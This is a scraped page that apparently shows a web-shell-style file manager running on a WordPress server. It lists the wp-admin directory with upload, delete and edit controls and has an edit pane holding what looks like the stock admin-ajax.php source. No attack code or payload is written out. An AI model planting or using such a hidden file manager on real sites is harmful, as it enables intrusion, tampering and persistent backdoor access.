golden hour
/var/www/nanshen/wp-admin
⬆️ Go Up
Upload
File/Folder
Size
Actions
about.php
26.51 KB
Del
OK
admin-ajax.php
3.22 KB
Del
OK
admin-footer.php
2.29 KB
Del
OK
admin-functions.php
403 B
Del
OK
admin-header.php
6.53 KB
Del
OK
admin-post.php
1.02 KB
Del
OK
admin.php
10.04 KB
Del
OK
async-upload.php
4 KB
Del
OK
comment.php
8.96 KB
Del
OK
credits.php
6.66 KB
Del
OK
css
-
Del
OK
custom-background.php
15.58 KB
Del
OK
custom-header.php
41.16 KB
Del
OK
customize.php
8.28 KB
Del
OK
edit-comments.php
11.39 KB
Del
OK
edit-form-advanced.php
28.08 KB
Del
OK
edit-form-comment.php
6.21 KB
Del
OK
edit-link-form.php
5.87 KB
Del
OK
edit-tag-form.php
6.79 KB
Del
OK
edit-tags.php
19.85 KB
Del
OK
edit.php
13.98 KB
Del
OK
export.php
8.14 KB
Del
OK
freedoms.php
3.28 KB
Del
OK
images
-
Del
OK
import.php
5.14 KB
Del
OK
includes
-
Del
OK
index.php
5.85 KB
Del
OK
install-helper.php
5.3 KB
Del
OK
install.php
10.22 KB
Del
OK
js
-
Del
OK
link-add.php
712 B
Del
OK
link-manager.php
3.39 KB
Del
OK
link-parse-opml.php
2.38 KB
Del
OK
link.php
2.59 KB
Del
OK
load-scripts.php
2.79 KB
Del
OK
load-styles.php
3.11 KB
Del
OK
maint
-
Del
OK
media-new.php
3.08 KB
Del
OK
media-upload.php
3.07 KB
Del
OK
media.php
5.12 KB
Del
OK
menu-header.php
7.63 KB
Del
OK
menu.php
12.38 KB
Del
OK
moderation.php
320 B
Del
OK
ms-admin.php
211 B
Del
OK
ms-delete-site.php
3.61 KB
Del
OK
ms-edit.php
231 B
Del
OK
ms-options.php
236 B
Del
OK
ms-sites.php
228 B
Del
OK
ms-themes.php
230 B
Del
OK
ms-upgrade-network.php
232 B
Del
OK
ms-users.php
228 B
Del
OK
my-sites.php
4.57 KB
Del
OK
nav-menus.php
37.54 KB
Del
OK
network
-
Del
OK
network.php
25.81 KB
Del
OK
options-discussion.php
13.36 KB
Del
OK
options-general.php
12.99 KB
Del
OK
options-head.php
492 B
Del
OK
options-media.php
5.69 KB
Del
OK
options-permalink.php
14.89 KB
Del
OK
options-reading.php
9.13 KB
Del
OK
options-writing.php
9.64 KB
Del
OK
options.php
9.9 KB
Del
OK
plugin-editor.php
11.25 KB
Del
OK
plugin-install.php
4 KB
Del
OK
plugins.php
19.8 KB
Del
OK
post-new.php
2.02 KB
Del
OK
post.php
9.07 KB
Del
OK
press-this.php
26.37 KB
Del
OK
profile.php
296 B
Del
OK
revision.php
8.15 KB
Del
OK
setup-config.php
11.69 KB
Del
OK
theme-editor.php
10.08 KB
Del
OK
theme-install.php
10.42 KB
Del
OK
themes.php
15.86 KB
Del
OK
tools.php
4.07 KB
Del
OK
update-core.php
26.99 KB
Del
OK
update.php
9.9 KB
Del
OK
upgrade-functions.php
338 B
Del
OK
upgrade.php
4.09 KB
Del
OK
upload.php
9.25 KB
Del
OK
user
-
Del
OK
user-edit.php
21.49 KB
Del
OK
user-new.php
17.74 KB
Del
OK
users.php
15.34 KB
Del
OK
widgets.php
15.36 KB
Del
OK
Edit: admin-ajax.php
<?php /** * WordPress AJAX Process Execution. * * @package WordPress * @subpackage Administration * * @link http://codex.wordpress.org/AJAX_in_Plugins */ /** * Executing AJAX process. * * @since 2.1.0 */ define( 'DOING_AJAX', true ); define( 'WP_ADMIN', true ); /** Load WordPress Bootstrap */ require_once( dirname( dirname( __FILE__ ) ) . '/wp-load.php' ); /** Allow for cross-domain requests (from the frontend). */ send_origin_headers(); // Require an action parameter if ( empty( $_REQUEST['action'] ) ) die( '0' ); /** Load WordPress Administration APIs */ require_once( ABSPATH . 'wp-admin/includes/admin.php' ); /** Load Ajax Handlers for WordPress Core */ require_once( ABSPATH . 'wp-admin/includes/ajax-actions.php' ); @header( 'Content-Type: text/plain; charset=' . get_option( 'blog_charset' ) ); @header( 'X-Robots-Tag: noindex' ); send_nosniff_header(); nocache_headers(); /** This action is documented in wp-admin/admin.php */ do_action( 'admin_init' ); $core_actions_get = array( 'fetch-list', 'ajax-tag-search', 'wp-compression-test', 'imgedit-preview', 'oembed-cache', 'autocomplete-user', 'dashboard-widgets', 'logged-in', ); $core_actions_post = array( 'oembed-cache', 'image-editor', 'delete-comment', 'delete-tag', 'delete-link', 'delete-meta', 'delete-post', 'trash-post', 'untrash-post', 'delete-page', 'dim-comment', 'add-link-category', 'add-tag', 'get-tagcloud', 'get-comments', 'replyto-comment', 'edit-comment', 'add-menu-item', 'add-meta', 'add-user', 'closed-postboxes', 'hidden-columns', 'update-welcome-panel', 'menu-get-metabox', 'wp-link-ajax', 'menu-locations-save', 'menu-quick-search', 'meta-box-order', 'get-permalink', 'sample-permalink', 'inline-save', 'inline-save-tax', 'find_posts', 'widgets-order', 'save-widget', 'set-post-thumbnail', 'date_format', 'time_format', 'wp-fullscreen-save-post', 'wp-remove-post-lock', 'dismiss-wp-pointer', 'upload-attachment', 'get-attachment', 'query-attachments', 'save-attachment', 'save-attachment-compat', 'send-link-to-editor', 'send-attachment-to-editor', 'save-attachment-order', 'heartbeat', 'get-revision-diffs', 'save-user-color-scheme', 'update-widget', 'query-themes', ); // Register core Ajax calls. if ( ! empty( $_GET['action'] ) && in_array( $_GET['action'], $core_actions_get ) ) add_action( 'wp_ajax_' . $_GET['action'], 'wp_ajax_' . str_replace( '-', '_', $_GET['action'] ), 1 ); if ( ! empty( $_POST['action'] ) && in_array( $_POST['action'], $core_actions_post ) ) add_action( 'wp_ajax_' . $_POST['action'], 'wp_ajax_' . str_replace( '-', '_', $_POST['action'] ), 1 ); add_action( 'wp_ajax_nopriv_heartbeat', 'wp_ajax_nopriv_heartbeat', 1 ); if ( is_user_logged_in() ) { /** * Fires authenticated AJAX actions for logged-in users. * * The dynamic portion of the hook name, $_REQUEST['action'], * refers to the name of the AJAX action callback being fired. * * @since 2.1.0 */ do_action( 'wp_ajax_' . $_REQUEST['action'] ); } else { /** * Fires non-authenticated AJAX actions for logged-out users. * * The dynamic portion of the hook name, $_REQUEST['action'], * refers to the name of the AJAX action callback being fired. * * @since 2.8.0 */ do_action( 'wp_ajax_nopriv_' . $_REQUEST['action'] ); } // Default status die( '0' );
Save